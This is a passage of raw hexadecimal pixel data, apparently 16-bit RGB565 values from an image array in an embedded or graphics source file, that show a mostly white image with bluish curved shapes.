0x1395, 0xa6ff, 0xf7ff, 0xfffd, 0xffbd, 0xffde, 0xffde, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xe7ff, 0xefff, 0xd79f, 0x4c77, 0x13d6, 0x1c57, 0x96be, 0xefff, 0xffff, 0xf7fe, 0xfffe, 0xffbe, 0xffde, 0xffbf, 0xffdf, 0xffff, 0xfffd, 0xfffe, 0xffff, 0xffdf, 0xfffe, 0xf7bb, 0xfffd, 0xffff, 0xf79e, 0xffdf, 0xffff, 0xffff, 0xa7bf, 0x3cb9, 0x1375, 0x2bb5, 0xbf7f, 0xefff, 0xefbd, 0xfffd, 0xfffd, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7de, 0xf7de, 0xefff, 0xd7ff, 0x3c35, 0x0b33, 0x2458, 0xb75f, 0xe7ff, 0xf7ff, 0xffdd, 0xffdd, 0xf7de, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xcf3d, 0xb67b, 0xae5b, 0xcf1d, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffdd, 0xfffe, 0xffff, 0xe7ff, 0xaf5f, 0x2c57, 0x0b94, 0x3415, 0xcfbf, 0xf7ff, 0xffde, 0xf7df, 0xefdf, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xfffe, 0xefff, 0xf7ff, 0xbf1f, 0x3416, 0x0bb6, 0x3499, 0xc79f, 0xf7ff, 0xf7ff, 0xefff, 0xffff, 0xfffe, 0xffde, 0xf7bd, 0xfffe, 0xffde, 0xf7ff, 0xffff, 0xf7df, 0xf7de, 0xf7fe, 0xf7fe, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xffdf, 0xe7ff, 0x9eff, 0x2c15, 0x1b94, 0x44b9, 0xefff, 0xffff, 0xff7f, 0xffdf, 0xf7de, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffde, 0xffde, 0xffff, 0xe7ff, 0x5d17, 0x1375, 0x1355, 0x969f, 0xe7ff, 0xf7ff, 0xffff, 0xffff, 0xffbe, 0xfffd, 0xfffd, 0xfffd, 0xf7ff, 0xffdf, 0xff9f, 0xff9f, 0xffbf, 0xffdf, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xd7df, 0x54f9, 0x0bb5, 0x13b2, 0x9f1e, 0xefff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff,
0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffde, 0xffde, 0xf7ff, 0xefff, 0xf7ff, 0xfffd, 0xf7ff, 0xaf3f, 0x2c58, 0x0b96, 0x2c17, 0xa63c, 0xefff, 0xf7ff, 0xffff, 0xf7ff, 0xf7df, 0xf7ff, 0xf7ff, 0xcf3f, 0x8ddd, 0x6d3a, 0x7d9c, 0xb6df, 0xe7ff, 0xf7df, 0xfffb, 0xffdf, 0xf7ff, 0xe7ff, 0xc77f, 0x5d18, 0x0395, 0x03d7, 0x763e, 0xefff, 0xffbc, 0xffbc, 0xffff, 0xffdf, 0xffdf, 0xffbe, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xf7bf, 0xffbf, 0xffde, 0xfffe, 0xff9c, 0xefff, 0x65fe, 0x0bb7, 0x1b76, 0x74f8, 0xd73d, 0xf7ff, 0xf7ff, 0xefdf, 0xefdf, 0xf7ff, 0xfffe, 0xfffe, 0xffdf, 0xf7df, 0xf7ff, 0xf7df, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xe7ff, 0x963a, 0x2bf4, 0x1375, 0x3437, 0xb77f, 0xefff, 0xffdc, 0xfffe, 0xffff, 0xffdf, 0xffde, 0xffdd, 0xfffd, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xf7ff, 0xefff, 0xffff, 0xffbd, 0xefff, 0x4d19, 0x03d7, 0x1b95, 0x6cd7, 0xd7bf, 0xe7ff, 0xefff, 0xf7fe, 0xf7de, 0xf7ff, 0xffff, 0xffdf, 0xffdd, 0xfffe, 0xf7df, 0xffdf, 0xffbe, 0xfffe, 0xeffe, 0xefff, 0xf7ff, 0xefff, 0xdf9f, 0x9dfb, 0x03d5, 0x0bb5, 0x3c57, 0xd7df, 0xffff, 0xf7de, 0xf7ff, 0xf7ff, 0xfffe, 0xffde, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xdfbf, 0x5518, 0x03d7, 0x1bb5, 0x6d79, 0xdfff, 0xf7ff, 0xefde, 0xf7ff, 0xefff, 0xf7fe, 0xfffe, 0xfffe, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xfffe, 0xfffd, 0xfffe, 0xf7ff, 0xf7ff, 0xefff, 0xdfff, 0x6d79, 0x1bf5, 0x0bb6, 0x551a, 0xdfdf, 0xffdf, 0xffff, 0xffff, 0xefff, 0xefdf, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xffde, 0xf7df, 0xdfff, 0xffde, 0xffff, 0xcf7f, 0x34b9, 0x0bb6, 0x2393, 0x961a, 0xdfff, 0xdfff, 0xefff, 0xffff, 0xffde, 0xffff, 0xf7fe, 0xffff, 0xf7df, 0xf7bf, 0xffff, 0xf7ff, 0xf7ff, 0xf7fd, 0xf7bd, 0xfffe, 0xf7ff, 0xefff, 0xd79f, 0x7559, 0x1b53, 0x1b94, 0x5cd8, 0xdfdf, 0xfffc, 0xffbe, 0xffbf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xfffe, 0xefff, 0x7ddc, 0x13b6, 0x0b54, 0x54f7, 0xc77f, 0xe7ff, 0xefff, 0xf7ff, 0xffff, 0xf7fe, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xe7ff, 0x9e1b, 0x3c15, 0x0b95, 0x14ba, 0xaf5e, 0xefff, 0xffbf, 0xffdf, 0xffdf, 0xf7ff, 0xf7ff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xf7ff, 0xd7df, 0x657a, 0x13b3, 0x2354, 0x4415, 0x967c, 0xd7ff, 0xe7ff, 0xefff, 0xffff, 0xffff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xdfff, 0xb77f, 0x5d1a, 0x2393, 0x1b52, 0x33f4, 0xb77f, 0xe7ff, 0xffff, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xff9d, 0xffff, 0xe7ff, 0xa71f, 0x33d4, 0x1af1, 0x3393, 0x6519, 0xb75f, 0xd7ff, 0xe7ff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xffff, 0xffdf, 0xf7ff, 0xe7ff, 0xdfff, 0xd7ff, 0x8e3d, 0x3c36, 0x1373, 0x23b4, 0x759a, 0xdfff, 0xf7ff, 0xf7de, 0xfffe, 0xf7fe, 0xffff, 0xf7df, 0xffff, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffff, 0xefff, 0x9e7e, 0x33b5, 0x1b33, 0x23d5, 0x5d7a, 0xaf7f, 0xdfff, 0xe7ff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xe7ff, 0xd7ff, 0xc7ff, 0x75bb, 0x3c36, 0x1b75, 0x23b3, 0x7dda, 0xe7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xdfff, 0x969d, 0x1b93, 0x1352, 0x23b3, 0x75db, 0xbfdf, 0xdfff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xdfff, 0xc7df, 0x759a, 0x2bd3, 0x1392, 0x1bb3, 0x8e5d, 0xe7df, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffde, 0xf7df, 0xe7ff, 0x75db, 0x1b72, 0x0b32, 0x3416, 0x861d, 0xcfff, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xefff, 0xe7ff, 0xbf9f, 0x655a, 0x2393, 0x1b52, 0x2bd3, 0x9ede, 0xefff, 0xffdf, 0xfffc, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7df, 0xe7ff, 0xbf7f, 0x33f4, 0x1b93, 0x2394, 0x5d19, 0xb75f, 0xdfff, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xef9e, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xe7ff, 0xdfff, 0xcfff, 0x863e, 0x33f5, 0x1b93, 0x1b52, 0x75ba, 0xcfff, 0xf7ff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffdf, 0xffdf, 0xf7df, 0xfffe, 0xffbd, 0xffdf, 0xe7ff, 0xa7ff, 0x3d3d, 0x0b96, 0x0312, 0x1b92, 0x5495, 0x9dfa, 0xc69d, 0xe73e, 0xffff, 0xfffe, 0xfffd, 0xffdc, 0xf7bd, 0xd75d, 0xa67b, 0x7559, 0x1bd5, 0x0b75, 0x0bb7, 0x1c38, 0x8e9f, 0xefff, 0xffde, 0xfffd, 0xf7fe, 0xffff, 0xffbf, 0xffdf, 0xf7ff, 0xefff, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xefff, 0xffff, 0xffdd, 0xfffe, 0xdfff, 0x7ebf, 0x1c39, 0x0378, 0x0b56, 0x33d6, 0x7518, 0xb67b, 0xd75c, 0xefde, 0xffff, 0xffff, 0xf7ff, 0xffde, 0xef7c, 0xb6bb, 0x865b, 0x44b6, 0x1373, 0x0356, 0x0398, 0x457f, 0xaf7f, 0xf7ff, 0xfffe, 0xffdd, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xfffe, 0xfffd, 0xffff, 0xf7ff, 0xffff, 0xffbe, 0xffbf, 0xe7df, 0x6e1f, 0x03f8, 0x0394, 0x1373, 0x4436, 0x7d79, 0xa6bc, 0xcf7d, 0xe7df, 0xf7df, 0xffdf, 0xffff, 0xf7bf, 0xef5f, 0xbe9d, 0x7dba, 0x3c55, 0x1b93, 0x0b94, 0x0396, 0x359f, 0xdfdf, 0xf7ff, 0xffbd, 0xfffe, 0xffff, 0xffbf, 0xffbf, 0xffbf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7df, 0xf7bf, 0xfffe, 0xcfff, 0x65dd, 0x0c18, 0x03b8, 0x13d7, 0x3c15, 0x8d78, 0xb69c, 0xcf5e, 0xe7ff, 0xf7ff, 0xffde, 0xffdf, 0xf7bf, 0xcf5e, 0xae9d, 0x85b8, 0x4c75, 0x1332, 0x0354, 0x0c17, 0x5dfd, 0xcfff, 0xf7ff, 0xffde, 0xffbd, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0xffbc, 0xfffe, 0xefff, 0xffff, 0xffdd, 0xefff, 0xb7ff, 0x45de, 0x03b9, 0x0315, 0x2332, 0x5494, 0x85f8, 0xaedc, 0xdfbf, 0xefdf, 0xf7ff, 0xffff, 0xf7de, 0xefff, 0xcf5d, 0xaebb, 0x85b8, 0x33d3, 0x0b75, 0x0377, 0x1419, 0x661d, 0xcfff, 0xe7ff, 0xf7fe, 0xfffe, 0xfffd, 0xf7ff, 0xf7ff, 0xffff, 0xffbf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xf7fe, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffbd, 0xe7ff, 0x869f, 0x1c3a, 0x0356, 0x1312, 0x33b4, 0x6d3a, 0xa65c, 0xd73e, 0xefdd, 0xfffd, 0xfffe, 0xffdf, 0xf7df, 0xdfbe, 0xbf3a, 0x8e37, 0x5cb4, 0x2373, 0x0b76, 0x03d8, 0x2d5d, 0xa7bf, 0xefff, 0xffba, 0xffdd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xefff, 0xcf9f, 0x7578, 0x3c35, 0x1bd4, 0x0bb5, 0x03b5, 0x03f7, 0x0458, 0x0479, 0x0cba, 0x0459, 0x03d8, 0x0b97, 0x0b35, 0x1356, 0x436f, 0x74d5, 0xae5a, 0xe7ff, 0xf7ff, 0xf7df, 0xffde, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xdfdf, 0xa69c, 0x54b6, 0x3415, 0x0353, 0x03b5, 0x03d6, 0x0418, 0x0459, 0x049a, 0x049a, 0x0438, 0x03f7, 0x03b6, 0x0374, 0x1bd4, 0x3c35, 0x75ba, 0xcf9f, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7dd, 0xfffe, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xefff, 0xe7ff, 0xd7ff, 0x96bc, 0x4cd5, 0x23f2, 0x0373, 0x0394, 0x03f6, 0x0417, 0x0479, 0x047a, 0x047a, 0x0439, 0x03f7, 0x03d6, 0x0b94, 0x23b3, 0x4c33, 0x8dd8, 0xdfdf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7be, 0xffdf, 0xffde, 0xffff, 0xe7bf, 0x95da, 0x4c55, 0x2bd5, 0x0b75, 0x0397, 0x03b8, 0x043b, 0x043a, 0x0c7b, 0x0c5a, 0x0418, 0x03d7, 0x0396, 0x1374, 0x2394, 0x54b7, 0x961b, 0xdfbf, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffbe, 0xffbe, 0xffde, 0xfffe, 0xf7ff, 0xdfbf, 0x961a, 0x4c34, 0x1b93, 0x0bb5, 0x03b7, 0x03d9, 0x043a, 0x0499, 0x0479, 0x049a, 0x03f7, 0x03d7, 0x0bd6, 0x1373, 0x2bd3, 0x5c95, 0xa67a, 0xe7df, 0xf7ff, 0xffde, 0xffde, 0xffff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xff9e, 0xffdf, 0xffbe, 0xffff, 0xefff, 0xaebc, 0x5cf6, 0x2bf4, 0x13b5, 0x0396, 0x03b6, 0x0439, 0x0439, 0x047a, 0x0c9b, 0x0439, 0x03b7, 0x0375, 0x0b74, 0x1b93, 0x4454, 0x7597, 0xc79e, 0xe7ff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdf, 0xffff, 0xffdf, 0xffde, 0xffde, 0xefdf, 0xefff, 0xe7ff, 0xcfff, 0xb77f, 0x8e5d, 0x6d7a, 0x4cb7, 0x3c56, 0x3415, 0x2bf4, 0x3456, 0x4497, 0x4cd8, 0x7dfc, 0x9edf, 0xd7bf, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffde, 0xffff, 0xffde, 0xf7df, 0xf7ff, 0xefff, 0xe7ff, 0xc79f, 0xa73f, 0x75fb, 0x4cd7, 0x3c96, 0x3435, 0x23f4, 0x2c15, 0x3456, 0x4c97, 0x6d5a, 0x965d, 0xbf7f, 0xd7ff, 0xe7ff, 0xefdf, 0xffff, 0xf7bf, 0xf7df, 0xffff, 0xfffe, 0xfffe, 0xffbd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xf7ff, 0xefff, 0xe7ff, 0xdfff, 0xc7bf, 0x9f1f, 0x75ba, 0x54d7, 0x3c56, 0x2c15, 0x2c16, 0x2c16, 0x3c77, 0x4cd9, 0x6559, 0x969e, 0xbf7f, 0xdfff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xe7ff, 0xc7df, 0x8e7e, 0x657a, 0x4d19, 0x3457, 0x2c36, 0x3436, 0x3436, 0x3c56, 0x4c97, 0x6dbb, 0x967e, 0xbfbf, 0xd7ff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffde, 0xffde, 0xffde, 0xf7ff, 0xf7ff, 0xe7ff, 0xbf7f, 0x967d, 0x6d7a, 0x4cb8, 0x3457, 0x3435, 0x3435, 0x3435, 0x3c76, 0x5d39, 0x6559, 0x9ebe, 0xcfdf, 0xe7ff, 0xefff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbe, 0xffff, 0xffde, 0xffde, 0xf7fe, 0xf7ff, 0xe7ff, 0xdfff, 0xbf9f, 0x9edf, 0x75fc, 0x54f9, 0x3c76, 0x3c76, 0x3436, 0x23b4, 0x3436, 0x4cb8, 0x655a, 0x8e3c, 0xb75f, 0xd7ff, 0xe7ff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xfffe, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xe7bf, 0xefff, 0xe7ff, 0xdfff, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xe7ff, 0xefff, 0xe7df, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffbf, 0xffbf, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xe7df, 0xefff, 0xefff, 0xe7df, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xffde, 0xffff, 0xf7de, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xe7ff, 0xe7ff, 0xdfdf, 0xe7ff, 0xe7ff, 0xe7ff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7fe, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xefdf, 0xefff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffde, 0xf7dd, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffde, 0xffff, 0xfffe, 0xfffe, 0xf7fe, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xe7ff, 0xefff, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffbe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffdd, 0xffde, 0xffde, 0xefff, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffbe, 0xffdf, 0xffdf, 0xffbe, 0xfffe, 0xffde, 0xffbd, 0xfffe, 0xf7bd, 0xffbe, 0xffbe, 0xffde, 0xffff, 0xffbe, 0xffdf, 0xffbe, 0xffde, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 